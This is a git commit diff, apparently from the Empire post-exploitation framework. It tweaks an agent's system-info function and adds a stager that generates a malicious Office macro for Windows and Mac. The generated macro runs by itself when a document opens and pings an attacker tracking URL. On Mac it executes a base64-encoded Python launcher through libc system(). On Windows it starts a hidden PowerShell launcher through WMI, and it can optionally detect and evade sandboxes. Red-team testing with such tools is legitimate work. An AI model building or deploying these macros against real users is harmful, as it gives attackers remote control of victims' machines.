xorrior 2017-11-09 00:04:09 -05:00
commit 241bf8c9ad
2 changed files with 191 additions and 3 deletions

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@ -739,7 +739,7 @@ def get_sysinfo(nonce='00000000'):
username = pwd.getpwuid(os.getuid())[0]
username = pwd.getpwuid(os.getuid())[0].strip("\\")
except Exception as e:
username = __FAILED_FUNCTION
@ -761,8 +761,10 @@ def get_sysinfo(nonce='00000000'):
internalIP = socket.gethostbyname(socket.gethostname())
except Exception as e:
internalIP = os.popen("ifconfig|grep inet|grep inet6 -v|grep -v|cut -d' ' -f2").read()
except Exception as e1:
osDetails = ",".join(osDetails)
except Exception as e:

lib/stagers/multi/ Normal file
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@ -0,0 +1,186 @@
from lib.common import helpers
import re
class Stager:
def __init__(self, mainMenu, params=[]): = {
'Name': 'Macro',
'Author': ['@enigma0x3', '@harmj0y', '@DisK0nn3cT', '@malcomvetter'],
'Description': ('Generates a Win/Mac cross platform MS Office macro for Empire, compatible with Office 97-2016 including Mac 2011 and 2016 (sandboxed).'),
'Comments': [
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
# Don't think the language matters except the framework requires it:
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
# don't think this OutFile is used anywhere:
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True'
'PixelTrackURL' : {
'Description' : 'URL to add in pixel tracking which OS attempted macro opening, useful for shell debugging and confirmation.',
'Required' : False,
'Value' : ''
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def formStr(varstr, instr):
holder = []
str1 = ''
str2 = ''
str1 = varstr + ' = "' + instr[:54] + '"'
for i in xrange(54, len(instr), 48):
holder.append('\t\t' + varstr + ' = '+ varstr +' + "'+instr[i:i+48])
str2 = '"\r\n'.join(holder)
str2 = str2 + "\""
str1 = str1 + "\r\n"+str2
return str1
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
safeChecks = self.options['SafeChecks']['Value']
pixelTrackURL = self.options['PixelTrackURL']['Value']
# generate the python launcher code
pylauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="python", encode=True, userAgent=userAgent, safeChecks=safeChecks)
if pylauncher == "":
print helpers.color("[!] Error in python launcher command generation.")
return ""
# render python launcher into python payload
pylauncher = pylauncher.replace("\"", "\"\"")
for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL):
pypayload = formStr("str", match)
# generate the powershell launcher code
poshlauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="powershell", encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
if poshlauncher == "":
print helpers.color("[!] Error in powershell launcher command generation.")
return ""
# render powershell launcher into powershell payload
poshchunks = list(helpers.chunks(poshlauncher, 50))
poshpayload = "Dim Str As String"
poshpayload += "\n\t\tstr = \"" + str(poshchunks[0])
for poshchunk in poshchunks[1:]:
poshpayload += "\n\t\tstr = str + \"" + str(poshchunk)
# if statements below are for loading Mac dylibs for compatibility
macro = """#If Mac Then
#If VBA7 Then
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
#End If
#End If
Sub Auto_Open()
End Sub
Sub Document_Open()
End Sub
Public Function Debugging() As Variant
On Error Resume Next
Dim tracking As String
tracking = "%s"
#If Mac Then
'Mac Rendering
If Val(Application.Version) < 15 Then 'Mac Office 2011
system ("curl " & tracking & "Mac2011")
Else 'Mac Office 2016
system ("curl " & tracking & "Mac2016")
End If
Dim result As Long
Dim str As String
'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python &")
result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python &")
'Windows Rendering
Dim objWeb As Object
Set objWeb = CreateObject("Microsoft.XMLHTTP")
objWeb.Open "GET", tracking & "Windows", False
Set objWMIService = GetObject("winmgmts:\\\\.\\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 0
Set objProcess = GetObject("winmgmts:\\\\.\\root\cimv2:Win32_Process")
objProcess.Create str, Null, objConfig, intProcessID
#End If
End Function""" % (pixelTrackURL, pypayload, poshpayload)
return macro